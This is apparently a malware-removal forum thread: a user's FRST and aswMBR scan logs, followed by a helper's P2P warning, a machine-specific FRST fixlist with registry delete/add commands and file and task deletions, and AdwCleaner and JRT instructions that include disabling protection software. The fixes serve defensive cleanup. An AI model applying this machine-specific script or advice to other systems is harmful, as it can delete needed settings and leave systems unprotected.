FirewallRules: [{416A0B8C-2763-42F0-82EB-9269719E1BE4}] => (Allow) C:\Program Files (x86)\Bonjour\mDNSResponder.exe
FirewallRules: [{15969D30-C471-468E-B2ED-1594FE384FC3}] => (Allow) C:\Program Files\Bonjour\mDNSResponder.exe
FirewallRules: [{08FE19D4-7434-48EA-A27A-93ED53D7717A}] => (Allow) C:\Program Files\Bonjour\mDNSResponder.exe
FirewallRules: [{933A444B-2C3D-45AC-80E9-EFE8EB8DAD9D}] => (Allow) C:\Program Files (x86)\Skype\Phone\Skype.exe
FirewallRules: [{EF266A5B-42EB-4853-A982-4DED1ADF6F73}] => (Allow) C:\Program Files (x86)\Battle.net\Battle.net.exe
FirewallRules: [{BC4FFE1F-5AF4-4233-8E52-5094D6FE9F07}] => (Allow) C:\Program Files (x86)\Battle.net\Battle.net.exe
FirewallRules: [{31F097A5-8E00-4169-A16D-1C9A71721FA1}] => (Allow) D:\Steam\Steam.exe
FirewallRules: [{F5C42520-0135-45B4-8FB0-5BD9692C80EE}] => (Allow) D:\Steam\Steam.exe
FirewallRules: [TCP Query User{3D2AB9FC-2A79-4098-9681-6706A621D53F}C:\program files\logitech gaming software\lcore.exe] => (Allow) C:\program files\logitech gaming software\lcore.exe
FirewallRules: [UDP Query User{09124E07-AE4B-4C80-A7E2-E96A37034496}C:\program files\logitech gaming software\lcore.exe] => (Allow) C:\program files\logitech gaming software\lcore.exe
FirewallRules: [{923D26F5-A4EE-433D-BE2B-5CE473180539}] => (Allow) C:\Program Files\AVAST Software\Avast\ng\vbox\aswFe.exe
FirewallRules: [{E6F2E9A0-F842-4541-8D31-CE38FDD09EDE}] => (Allow) C:\Program Files\AVAST Software\Avast\ng\vbox\aswFe.exe
FirewallRules: [{F906BBDC-3C41-494C-A264-2234D81FEF3E}] => (Block) D:\Program Files\Adobe\Adobe Premiere Elements 2011\Adobe Premiere Elements 11\Adobe Premiere Elements.exe
FirewallRules: [{BD0F045D-D2C0-41A7-8024-69C5F302A95F}] => (Allow) D:\Steam\SteamApps\common\dota 2 beta\game\bin\win64\dota2.exe
FirewallRules: [{7710A3C2-777C-4F45-BA7E-19121D633EB3}] => (Allow) D:\Steam\SteamApps\common\dota 2 beta\game\bin\win64\dota2.exe
FirewallRules: [{7172F858-7B10-43BC-B718-09A53F078F3C}] => (Allow) C:\Program Files\Bonjour\mDNSResponder.exe
FirewallRules: [{6B94AB4E-EBC9-430B-A32F-B62386B68D88}] => (Allow) C:\Program Files\Bonjour\mDNSResponder.exe
FirewallRules: [{F70F4B42-49F1-4B1A-B8A8-FCF794C81494}] => (Allow) C:\Program Files (x86)\Bonjour\mDNSResponder.exe
FirewallRules: [{045729B0-69AA-489E-BE8C-C51AC1A7B953}] => (Allow) C:\Program Files (x86)\Bonjour\mDNSResponder.exe
FirewallRules: [{92708362-07EC-40D9-A2DB-B96340F268FB}] => (Allow) C:\Program Files\iTunes\iTunes.exe
FirewallRules: [{4B096532-9213-4604-8B21-D8BCE26411CE}] => (Allow) C:\Program Files (x86)\Remote Mouse\RemoteMouse.exe
FirewallRules: [{0104B469-8DD7-41D2-9979-185C8C113A44}] => (Allow) C:\Program Files (x86)\Remote Mouse\RemoteMouse.exe
FirewallRules: [{83A03678-B554-4993-9E39-0C22F10E135B}] => (Allow) D:\SPSS\stats.com
FirewallRules: [{091CE1FB-5C3F-4138-8341-49FEB2CFD24B}] => (Allow) D:\SPSS\stats.exe
FirewallRules: [{9576161E-2723-4775-B358-84BB54C518DA}] => (Allow) D:\SPSS\stats.com
FirewallRules: [{5CABC212-DC4A-4B5F-A0FE-532EA8330453}] => (Allow) D:\SPSS\stats.exe
FirewallRules: [{394EAA14-7FAC-47B7-B3D9-7B4756AB1A7B}] => (Allow) D:\SPSS\WinWrapIDE.exe
FirewallRules: [{16A7A8A5-316D-425F-870E-5896D1CE4C33}] => (Allow) D:\SPSS\WinWrapIDE.exe
FirewallRules: [{79364F63-7C39-456E-AB8F-8757D05D824C}] => (Allow) D:\Steam\SteamApps\common\GarrysMod\hl2.exe
FirewallRules: [{54FF873C-F71A-4CCF-8775-0C1D01F98DE2}] => (Allow) D:\Steam\SteamApps\common\GarrysMod\hl2.exe
FirewallRules: [{3B43C12B-BCDF-45BF-B840-0535E1E51BB0}] => (Allow) D:\Ubisoft Game Launcher\games\Rainbow Six Siege - Open Beta\RainbowSix.exe
FirewallRules: [{E52DF45C-B750-4C08-A94D-1C9E5FD0C9E0}] => (Allow) D:\Ubisoft Game Launcher\games\Rainbow Six Siege - Open Beta\RainbowSix.exe
FirewallRules: [TCP Query User{5FA1C1D8-35DC-4C59-B59E-E79663992D79}C:\program files (x86)\remote mouse\remotemouse.exe] => (Allow) C:\program files (x86)\remote mouse\remotemouse.exe
FirewallRules: [UDP Query User{B382372C-70E0-4294-8918-424DD03F9B35}C:\program files (x86)\remote mouse\remotemouse.exe] => (Allow) C:\program files (x86)\remote mouse\remotemouse.exe
FirewallRules: [{779D02B6-A237-497E-8EA6-A0FE4181802E}] => (Allow) D:\Steam\SteamApps\common\Clicker Heroes\Clicker Heroes.exe
FirewallRules: [{8F8BCB79-A539-484F-91B1-F34943ED9B63}] => (Allow) D:\Steam\SteamApps\common\Clicker Heroes\Clicker Heroes.exe
FirewallRules: [{FA6B12F6-052C-4390-B321-7E5ED5365770}] => (Allow) D:\Steam\SteamApps\common\Tom Clancy's Rainbow Six Siege\RainbowSix.exe
FirewallRules: [{FD71A44F-D3A8-4A46-B9B5-A3FFF96D2B7A}] => (Allow) D:\Steam\SteamApps\common\Tom Clancy's Rainbow Six Siege\RainbowSix.exe
FirewallRules: [{3E390A03-0EC6-460A-AFF8-07A3B3CE42A7}] => (Allow) C:\Program Files (x86)\Raptr\raptr.exe
FirewallRules: [{F56F3DD1-6F01-4E52-AF5A-050CF4A4240E}] => (Allow) C:\Program Files (x86)\Raptr\raptr.exe
FirewallRules: [{133D51D8-9D57-49D0-A255-8F344FBE942D}] => (Allow) C:\Program Files (x86)\Raptr\raptr_im.exe
FirewallRules: [{7EFE47F1-0DAB-47F3-BB87-FB89C0045DAF}] => (Allow) C:\Program Files (x86)\Raptr\raptr_im.exe
FirewallRules: [{3D3C4B45-00E1-45D2-A21E-63FFE437D631}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
StandardProfile\AuthorizedApplications: [C:\Program Files (x86)\Spybot - Search & Destroy 2\SDTray.exe] => Enabled:Spybot - Search & Destroy tray access
StandardProfile\AuthorizedApplications: [C:\Program Files (x86)\Spybot - Search & Destroy 2\SDFSSvc.exe] => Enabled:Spybot-S&D 2 Scanner Service
StandardProfile\AuthorizedApplications: [C:\Program Files (x86)\Spybot - Search & Destroy 2\SDUpdate.exe] => Enabled:Spybot-S&D 2 Updater
StandardProfile\AuthorizedApplications: [C:\Program Files (x86)\Spybot - Search & Destroy 2\SDUpdSvc.exe] => Enabled:Spybot-S&D 2 Background update service

==================== Restore Points =========================

12-02-2016 19:34:43 Windows Update
15-02-2016 13:41:32 Windows Backup
18-02-2016 15:21:16 Windows Update
21-02-2016 16:50:40 Windows Update
21-02-2016 19:00:07 Windows Backup
28-02-2016 19:00:09 Windows Backup

==================== Faulty Device Manager Devices =============


==================== Event log errors: =========================

Application errors:
==================
Error: (02/29/2016 08:34:29 PM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: KYM-PC)
Description: Activation of app Microsoft.XboxApp_8wekyb3d8bbwe!Microsoft.XboxApp failed with error: -2147009284 See the Microsoft-Windows-TWinUI/Operational log for additional information.

Error: (02/29/2016 08:34:29 PM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: KYM-PC)
Description: Activation of app Microsoft.WindowsAlarms_8wekyb3d8bbwe!App failed with error: -2147009284 See the Microsoft-Windows-TWinUI/Operational log for additional information.

Error: (02/29/2016 08:32:37 PM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: KYM-PC)
Description: Activation of app Microsoft.WindowsAlarms_8wekyb3d8bbwe!App failed with error: -2147009284 See the Microsoft-Windows-TWinUI/Operational log for additional information.

Error: (02/29/2016 08:31:37 PM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: KYM-PC)
Description: Activation of app Microsoft.Getstarted_2.6.12.0_x64__8wekyb3d8bbwe:App.AppX7mv0s3r0wanj0n66dy6vax24ps6avzvz.mca failed with error: -2144927149 See the Microsoft-Windows-TWinUI/Operational log for additional information.

Error: (02/29/2016 08:31:37 PM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: KYM-PC)
Description: Activation of app Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUI failed with error: -2147023170 See the Microsoft-Windows-TWinUI/Operational log for additional information.

Error: (02/29/2016 08:31:36 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: SearchUI.exe, version: 10.0.10240.16603, time stamp: 0x5655390b
Faulting module name: CortanaApi.dll, version: 0.0.0.0, time stamp: 0x56553724
Exception code: 0x80000003
Fault offset: 0x0000000000151c4f
Faulting process id: 0x6e4
Faulting application start time: 0xSearchUI.exe0
Faulting application path: SearchUI.exe1
Faulting module path: SearchUI.exe2
Report Id: SearchUI.exe3
Faulting package full name: SearchUI.exe4
Faulting package-relative application ID: SearchUI.exe5

Error: (02/29/2016 08:30:18 PM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: KYM-PC)
Description: Activation of app Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUI failed with error: -2147023170 See the Microsoft-Windows-TWinUI/Operational log for additional information.

Error: (02/29/2016 08:30:18 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: SearchUI.exe, version: 10.0.10240.16603, time stamp: 0x5655390b
Faulting module name: CortanaApi.dll, version: 0.0.0.0, time stamp: 0x56553724
Exception code: 0x80000003
Fault offset: 0x0000000000151c4f
Faulting process id: 0xab4
Faulting application start time: 0xSearchUI.exe0
Faulting application path: SearchUI.exe1
Faulting module path: SearchUI.exe2
Report Id: SearchUI.exe3
Faulting package full name: SearchUI.exe4
Faulting package-relative application ID: SearchUI.exe5

Error: (02/29/2016 08:30:17 PM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: KYM-PC)
Description: Activation of app Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUI failed with error: -2147023170 See the Microsoft-Windows-TWinUI/Operational log for additional information.

Error: (02/29/2016 08:30:17 PM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: KYM-PC)
Description: Activation of app Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUI failed with error: -2147023170 See the Microsoft-Windows-TWinUI/Operational log for additional information.


System errors:
=============
Error: (02/29/2016 08:35:26 PM) (Source: Microsoft-Windows-WindowsUpdateClient) (EventID: 20) (User: NT AUTHORITY)
Description: Installation Failure: Windows failed to install the following update with error 0x80073cf9: Windows Alarms & Clock.

Error: (02/29/2016 08:35:26 PM) (Source: Microsoft-Windows-WindowsUpdateClient) (EventID: 20) (User: NT AUTHORITY)
Description: Installation Failure: Windows failed to install the following update with error 0x80070490: Windows Alarms & Clock.

Error: (02/29/2016 08:35:20 PM) (Source: Microsoft-Windows-WindowsUpdateClient) (EventID: 20) (User: NT AUTHORITY)
Description: Installation Failure: Windows failed to install the following update with error 0x80073cf9: Windows Alarms & Clock.

Error: (02/29/2016 08:35:20 PM) (Source: Microsoft-Windows-WindowsUpdateClient) (EventID: 20) (User: NT AUTHORITY)
Description: Installation Failure: Windows failed to install the following update with error 0x80070490: Windows Alarms & Clock.

Error: (02/29/2016 08:34:28 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: The Intel(R) Management and Security Application Local Management Service service failed to start due to the following error:
%%2

Error: (02/29/2016 08:34:28 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: The Intel(R) Dynamic Application Loader Host Interface Service service failed to start due to the following error:
%%2

Error: (02/29/2016 08:32:23 PM) (Source: Service Control Manager) (EventID: 7001) (User: )
Description: The Net.Tcp Listener Adapter service depends on the Net.Tcp Port Sharing Service service which failed to start because of the following error:
%%1058

Error: (02/29/2016 08:32:23 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: The LogMeIn Hamachi Tunneling Engine service failed to start due to the following error:
%%2

Error: (02/29/2016 08:31:47 PM) (Source: DCOM) (EventID: 10005) (User: KYM-PC)
Description: 1084WSearchUnavailable{7D096C5F-AC08-4F1F-BEB7-5C22C517CE39}

Error: (02/29/2016 08:31:47 PM) (Source: DCOM) (EventID: 10005) (User: KYM-PC)
Description: 1084WSearchUnavailable{7D096C5F-AC08-4F1F-BEB7-5C22C517CE39}


CodeIntegrity:
===================================
Date: 2016-02-13 23:54:36.285
Description: Code Integrity determined that a process (\Device\HarddiskVolume2\WINDOWS\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe) attempted to load \Device\HarddiskVolume2\WINDOWS\assembly\GAC\Microsoft.StdFormat\7.0.3300.0__b03f5f7f11d50a3a\Microsoft.StdFormat.dll that did not meet the Microsoft signing level requirements.

Date: 2016-02-13 23:54:36.256
Description: Code Integrity determined that a process (\Device\HarddiskVolume2\WINDOWS\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe) attempted to load \Device\HarddiskVolume2\WINDOWS\assembly\GAC\ADODB\7.0.3300.0__b03f5f7f11d50a3a\ADODB.dll that did not meet the Microsoft signing level requirements.

Date: 2016-02-13 23:54:36.214
Description: Code Integrity determined that a process (\Device\HarddiskVolume2\WINDOWS\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe) attempted to load \Device\HarddiskVolume2\WINDOWS\assembly\GAC\MSDATASRC\7.0.3300.0__b03f5f7f11d50a3a\MSDATASRC.dll that did not meet the Microsoft signing level requirements.

Date: 2016-02-13 23:54:36.157
Description: Code Integrity determined that a process (\Device\HarddiskVolume2\WINDOWS\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe) attempted to load \Device\HarddiskVolume2\WINDOWS\assembly\GAC\Microsoft.StdFormat\7.0.3300.0__b03f5f7f11d50a3a\Microsoft.StdFormat.dll that did not meet the Microsoft signing level requirements.

Date: 2016-02-13 23:54:36.135
Description: Code Integrity determined that a process (\Device\HarddiskVolume2\WINDOWS\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe) attempted to load \Device\HarddiskVolume2\WINDOWS\assembly\GAC\ADODB\7.0.3300.0__b03f5f7f11d50a3a\ADODB.dll that did not meet the Microsoft signing level requirements.

Date: 2016-02-13 23:54:36.113
Description: Code Integrity determined that a process (\Device\HarddiskVolume2\WINDOWS\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe) attempted to load \Device\HarddiskVolume2\WINDOWS\assembly\GAC\MSDATASRC\7.0.3300.0__b03f5f7f11d50a3a\MSDATASRC.dll that did not meet the Microsoft signing level requirements.

Date: 2016-02-13 23:54:35.470
Description: Code Integrity determined that a process (\Device\HarddiskVolume2\WINDOWS\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe) attempted to load \Device\HarddiskVolume2\WINDOWS\assembly\GAC\stdole\7.0.3300.0__b03f5f7f11d50a3a\stdole.dll that did not meet the Microsoft signing level requirements.

Date: 2016-02-13 23:54:35.328
Description: Code Integrity determined that a process (\Device\HarddiskVolume2\WINDOWS\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe) attempted to load \Device\HarddiskVolume2\WINDOWS\assembly\GAC\stdole\7.0.3300.0__b03f5f7f11d50a3a\stdole.dll that did not meet the Microsoft signing level requirements.

Date: 2016-02-13 23:51:19.676
Description: Code Integrity determined that a process (\Device\HarddiskVolume2\WINDOWS\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe) attempted to load \Device\HarddiskVolume2\WINDOWS\assembly\GAC\Microsoft.StdFormat\7.0.3300.0__b03f5f7f11d50a3a\Microsoft.StdFormat.dll that did not meet the Microsoft signing level requirements.

Date: 2016-02-13 23:51:19.646
Description: Code Integrity determined that a process (\Device\HarddiskVolume2\WINDOWS\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe) attempted to load \Device\HarddiskVolume2\WINDOWS\assembly\GAC\ADODB\7.0.3300.0__b03f5f7f11d50a3a\ADODB.dll that did not meet the Microsoft signing level requirements.


==================== Memory info ===========================

Processor: Intel(R) Core(TM) i5-4670K CPU @ 3.40GHz
Percentage of memory in use: 16%
Total physical RAM: 16271.13 MB
Available physical RAM: 13512.53 MB
Total Virtual: 32655.13 MB
Available Virtual: 29616.68 MB

==================== Drives ================================

Drive c: () (Fixed) (Total:111.69 GB) (Free:13.97 GB) NTFS ==>[drive with boot components (obtained from BCD)]
Drive d: (New Volume) (Fixed) (Total:931.41 GB) (Free:512.93 GB) NTFS
Drive f: (Seagate Expansion Drive) (Fixed) (Total:1863.02 GB) (Free:333.52 GB) NTFS

==================== MBR & Partition Table ==================

========================================================
Disk: 0 (MBR Code: Windows 7 or 8) (Size: 931.5 GB) (Disk ID: 4E0A8E17)
Partition 1: (Not Active) - (Size=931.4 GB) - (Type=07 NTFS)

========================================================
Disk: 1 (MBR Code: Windows 7 or 8) (Size: 111.8 GB) (Disk ID: 4B95E549)
Partition 1: (Active) - (Size=111.7 GB) - (Type=07 NTFS)

========================================================
Disk: 2 (Size: 1863 GB) (Disk ID: 908BDE7D)
Partition 1: (Not Active) - (Size=1863 GB) - (Type=07 NTFS)

==================== End of Addition.txt ============================

aswMBR version 1.0.1.2252 Copyright(c) 2014 AVAST Software
Run date: 2016-02-29 20:47:33
-----------------------------
20:47:33.992 OS Version: Windows x64 6.2.9200
20:47:33.992 Number of processors: 4 586 0x3C03
20:47:33.992 ComputerName: KYM-PC UserName: Kym
20:47:34.235 Initialize success
20:47:34.242 VM: initialized successfully
20:47:34.243 VM: Intel CPU supported virtualized
20:47:43.424 VM: disk I/O iaStorA.sys
20:47:45.547 AVAST engine defs: 16022900
20:47:52.042 Disk 0 \Device\Harddisk0\DR0 -> \Device\0000002f
20:47:52.043 Disk 0 Vendor: WDC_WD10EZRX-00A8LB0 01.01A01 Size: 953869MB BusType: 11
20:47:52.046 Disk 1 (boot) \Device\Harddisk1\DR1 -> \Device\00000030
20:47:52.047 Disk 1 Vendor: Samsung_SSD_840_EVO_120GB EXT0BB6Q Size: 114473MB BusType: 11
20:47:52.054 Disk 1 MBR read successfully
20:47:52.056 Disk 1 MBR scan
20:47:52.058 Disk 1 Windows 7 default MBR code
20:47:52.060 Disk 1 Partition 1 80 (A) 07 HPFS/NTFS NTFS 114371 MB offset 206848
20:47:52.066 Disk 1 scanning C:\WINDOWS\system32\drivers
20:47:52.741 Service scanning
20:47:55.885 Modules scanning
20:47:55.904 Disk 1 trace - called modules:
20:47:55.923 ntoskrnl.exe CLASSPNP.SYS disk.sys ACPI.sys storport.sys hal.dll iaStorA.sys
20:47:55.931 1 nt!IofCallDriver -> \Device\Harddisk1\DR1[0xffffe0019a1e4060]
20:47:55.936 3 CLASSPNP.SYS[fffff8004bcb46c5] -> nt!IofCallDriver -> [0xffffe00199b88970]
20:47:55.942 5 ACPI.sys[fffff8004ae21361] -> nt!IofCallDriver -> [0xffffe00199b8e040]
20:47:55.947 7 ACPI.sys[fffff8004ae21361] -> nt!IofCallDriver -> \Device\00000030[0xffffe00199b90060]
20:47:56.102 AVAST engine scan C:\WINDOWS
20:47:56.331 AVAST engine scan C:\WINDOWS\system32
20:48:15.220 AVAST engine scan C:\WINDOWS\system32\drivers
20:48:16.311 AVAST engine scan C:\Users\Kym
20:49:36.627 AVAST engine scan C:\ProgramData
20:49:55.722 Disk 1 statistics 3041260/0/0 @ 20.88 MB/s
20:49:55.726 Scan finished successfully
20:50:05.349 Disk 1 MBR has been saved successfully to "C:\Users\Kym\Desktop\MBR.dat"
20:50:05.352 The log file has been saved successfully to "C:\Users\Kym\Desktop\aswMBR.txt"

kym.preston
2016-02-29, 13:18
I have also backed up my registry

Juliet
2016-02-29, 19:47
P2P Warning

------------------------------
I see you have peer-to-peer (P2P) file sharing software installed on your computer (uTorrent). I advise you avoid P2P file sharing programmes; they are a security risk which can make your computer susceptible to malware. File sharing networks are thoroughly infected and infested with malware - worms (http://en.wikipedia.org/wiki/Computer_worm), backdoor Trojans (http://www.symantec.com/security_response/writeup.jsp?docid=2001-062614-1754-99), IRCBots (http://en.wikipedia.org/wiki/IRC_bot), and rootkits (http://en.wikipedia.org/wiki/Rootkit) propagate via P2P file sharing networks, gaming, and underground sites. Users visiting such pages may see innocuous-looking banner ads containing code which can trigger pop-up ads and malicious Flash ads that install viruses, Trojans, and spyware. The best way to reduce the risk of infection is to avoid these types of web sites and not use P2P applications. Please read the following articles for more information.

Risks of File-Sharing Technology (http://www.us-cert.gov/cas/tips/ST05-007.html)
P2P Software User Advisories (http://aresgalaxy.sourceforge.net/p2prisks.htm)
More malware is traveling on P2P networks these days (http://www.computerworld.com/s/article/9240067/More_malware_is_traveling_on_P2P_networks_these_days)

Your P2P software can be removed by following the instructions below.

Press the Windows Key + R on your keyboard at the same time. Type appwiz.cpl and click OK.
Search for the aforementioned programme(s), right-click and click Uninstall.

If you choose not to, please refrain from using the programme(s) during this process.
~~~~~~~~~~~~~~~~~~~~~~~~~

Please open Notepad (Start -> Run -> type notepad in the Open field -> OK). *Do not use WordPad* or any text editor other than Notepad, or the script will fail. Then copy and paste the text present inside the quote box below:
To do this, highlight the contents of the box, right-click on it and select Copy.
Paste this into the open Notepad window. Save it to the Desktop as fixlist.txt.
NOTE: It's important that both files, FRST/FRST64 and fixlist.txt, are in the same location or the fix will not work.
It needs to be saved next to the "Farbar Recovery Scan Tool" (if asked to overwrite an existing one, please allow).


start
CreateRestorePoint:
CloseProcesses:
ShellIconOverlayIdentifiers: [ OneDrive1] -> {BBACC218-34EA-4666-9D7A-C78F2274A524} => C:\Users\Kym\AppData\Local\Microsoft\OneDrive\17.3.6201.1019\amd64\FileSyncShell64.dll No File
ShellIconOverlayIdentifiers: [ OneDrive2] -> {5AB7172C-9C11-405C-8DD5-AF20F3606282} => C:\Users\Kym\AppData\Local\Microsoft\OneDrive\17.3.6201.1019\amd64\FileSyncShell64.dll No File
ShellIconOverlayIdentifiers: [ OneDrive3] -> {A78ED123-AB77-406B-9962-2A5D9D2F7F30} => C:\Users\Kym\AppData\Local\Microsoft\OneDrive\17.3.6201.1019\amd64\FileSyncShell64.dll No File
ShellIconOverlayIdentifiers: [ OneDrive4] -> {F241C880-6982-4CE5-8CF7-7085BA96DA5A} => C:\Users\Kym\AppData\Local\Microsoft\OneDrive\17.3.6201.1019\amd64\FileSyncShell64.dll No File
ShellIconOverlayIdentifiers: [ OneDrive5] -> {A0396A93-DC06-4AEF-BEE9-95FFCCAEF20E} => C:\Users\Kym\AppData\Local\Microsoft\OneDrive\17.3.6201.1019\amd64\FileSyncShell64.dll No File
ShellIconOverlayIdentifiers: [GDriveSharedOverlay] -> {81539FE6-33C7-4CE7-90C7-1C7B8F2F2D43} => No File
ShellIconOverlayIdentifiers-x32: [ OneDrive1] -> {BBACC218-34EA-4666-9D7A-C78F2274A524} => C:\Users\Kym\AppData\Local\Microsoft\OneDrive\17.3.6201.1019\FileSyncShell.dll No File
ShellIconOverlayIdentifiers-x32: [ OneDrive2] -> {5AB7172C-9C11-405C-8DD5-AF20F3606282} => C:\Users\Kym\AppData\Local\Microsoft\OneDrive\17.3.6201.1019\FileSyncShell.dll No File
ShellIconOverlayIdentifiers-x32: [ OneDrive3] -> {A78ED123-AB77-406B-9962-2A5D9D2F7F30} => C:\Users\Kym\AppData\Local\Microsoft\OneDrive\17.3.6201.1019\FileSyncShell.dll No File
ShellIconOverlayIdentifiers-x32: [ OneDrive4] -> {F241C880-6982-4CE5-8CF7-7085BA96DA5A} => C:\Users\Kym\AppData\Local\Microsoft\OneDrive\17.3.6201.1019\FileSyncShell.dll No File
ShellIconOverlayIdentifiers-x32: [ OneDrive5] -> {A0396A93-DC06-4AEF-BEE9-95FFCCAEF20E} => C:\Users\Kym\AppData\Local\Microsoft\OneDrive\17.3.6201.1019\FileSyncShell.dll No File
SearchScopes: HKLM -> DefaultScope value is missing
SearchScopes: HKLM-x32 -> DefaultScope value is missing
BHO-x32: No Name -> {c4e7ab80-82fd-49d4-801d-669cc0a2392a} -> No File
FF Plugin-x32: @pandonetworks.com/PandoWebPlugin -> C:\Program Files (x86)\Pando Networks\Media Booster\npPandoWebPlugin.dll [No File]
CHR Plugin: (Java(TM) Platform SE 7 U55) - C:\Program Files (x86)\Java\jre7\bin\plugin2\npjp2.dll => No File
C:\Users\Kym\IP_Log_Data.js
C:\Users\Kym\Network_Meter_Data.js
C:\Users\Kym\AppData\Local\Temp\ICReinstall_setup.exe
C:\Users\Kym\AppData\Local\Temp\raptrpatch.exe
C:\Users\Kym\AppData\Local\Temp\raptr_stub.exe
C:\Users\Kym\AppData\Local\Temp\readSTILog.dll
C:\Users\Kym\AppData\Local\Temp\SIInvoker.exe
C:\Users\Kym\AppData\Local\Temp\tmp5300.exe
C:\Users\Kym\AppData\Local\Temp\tmp93FD.exe
C:\Users\Kym\AppData\Local\Temp\vlc-2.2.1-win32.exe
CustomCLSID: HKU\S-1-5-21-788086572-3644745805-1037152649-1000_Classes\CLSID\{71DCE5D6-4B57-496B-AC21-CD5B54EB93FD}\localserver32 -> C:\Users\Kym\AppData\Local\Microsoft\OneDrive\17.3.6201.1019\FileCoAuth.exe => No File
Task: {0670C04C-B47A-469A-BABD-11885BDDC6F8} - \Microsoft\Windows\Setup\GWXTriggers\refreshgwxconfig-B -> No File <==== ATTENTION
Task: {0FD0CF68-1874-4073-9CEF-63D8E9B7BFA5} - System32\Tasks\LaunchSignup => C:\Program Files (x86)\MyPC Backup\Signup Wizard.exe <==== ATTENTION
Task: {1EB27F80-D69B-4285-8431-E37E2A44624A} - \Microsoft\Windows\Setup\GWXTriggers\MachineUnlock-5d -> No File <==== ATTENTION
Task: {23C32510-6B84-4F00-B6A2-A3556CA995C0} - \Microsoft\Windows\Setup\gwx\refreshgwxconfigandcontent -> No File <==== ATTENTION
Task: {2425DF79-2B81-4356-8999-0E846F585C3E} - \Microsoft\Windows\Setup\GWXTriggers\OutOfIdle-5d -> No File <==== ATTENTION
Task: {3405AE0C-9596-4F8A-B29D-FDD7C18CB80B} - \Microsoft\Windows\Setup\gwx\refreshgwxconfig -> No File <==== ATTENTION
Task: {4751C4C6-6F55-4FD3-A873-D2FF79B6ABA6} - \Microsoft\Windows\Setup\gwx\refreshgwxcontent -> No File <==== ATTENTION
Task: {D034A175-EFC9-4CF2-A88F-697EA1808E3E} - \Microsoft\Windows\Setup\GWXTriggers\Time-5d -> No File <==== ATTENTION
Task: {EC1A0053-4233-4A19-B33C-29FB18854840} - \Microsoft\Windows\Setup\gwx\launchtrayprocess -> No File <==== ATTENTION
Task: {F260FB74-77B4-4085-8A55-DE82940B9EC6} - \Microsoft\Windows\Setup\GWXTriggers\OutOfSleep-5d -> No File <==== ATTENTION
Task: {FB4D8425-9FA5-4EB8-8614-99CAFB66A562} - \Microsoft\Windows\Setup\GWXTriggers\Logon-5d -> No File <==== ATTENTION
Task: {FCDDBDC9-5E45-4F07-B5EC-8A79155B5A53} - \Microsoft\Windows\Setup\GWXTriggers\Telemetry-4xd -> No File <==== ATTENTION
ShortcutWithArgument: C:\Users\Kym\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Launch Internet Explorer Browser.lnk -> C:\Program Files (x86)\Internet Explorer\iexplore.exe (Microsoft Corporation) -> hxxp://www.mystartsearch.com/?type=sc&ts=1415950204&from=ild&uid=WDCXWD10EZRX-00A8LB0_WD-WMC1U207215772157
AlternateDataStreams: C:\Users\.DS_Store:AFP_AfpInfo
AlternateDataStreams: C:\Users\Kym\.DS_Store:AFP_AfpInfo
AlternateDataStreams: C:\Users\Public\.DS_Store:AFP_AfpInfo
EmptyTemp:
End
Reg: reg delete HKLM\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local /f
Reg: reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local /f

Reg: reg delete HKLM\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local /f
Reg: reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local /f


Open FRST/FRST64 and press the > Fix < button just once and wait.
If for some reason the tool needs a restart, please make sure you let the system restart normally. After that let the tool complete its run.
When finished FRST will generate a log on the Desktop (Fixlog.txt). Please post it to your reply.

~~~~~~~~~~~~~~~~~~~~~~~~

AdwCleaner

Please download AdwCleaner (http://www.bleepingcomputer.com/download/adwcleaner/) and save the file to your Desktop.
Right-click AdwCleaner.exe and select Run as administrator to run the programme.
Follow the prompts.
Click Scan.
Upon completion, click Report. A log (AdwCleaner[SX].txt) will open. Briefly check the log for anything you know to be legitimate.
Ensure anything you know to be legitimate does not have a checkmark, and click Clean.
Follow the prompts and allow your computer to reboot.
After rebooting, a log (AdwCleaner[SX].txt) will open. Copy the contents of the log and paste in your next reply.

-- File and registry key backups are made for anything removed using this tool. Should a legitimate entry be removed (otherwise known as a 'false-positive'), simple steps can be taken to restore the entry. Please do not overly concern yourself with the contents of AdwCleaner[R0].txt.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~


Please download Junkware Removal Tool (http://www.bleepingcomputer.com/download/junkware-removal-tool/), or from here: http://downloads.malwarebytes.org/file/jrt, to your desktop.

Shut down your protection software now to avoid potential conflicts.
Run the tool by double-clicking it. If you are using Windows Vista, 7, or 8, instead of double-clicking, right-click JRT.exe and select "Run as Administrator".
The tool will open and start scanning your system.
Please be patient as this can take a while to complete depending on your system's specifications.
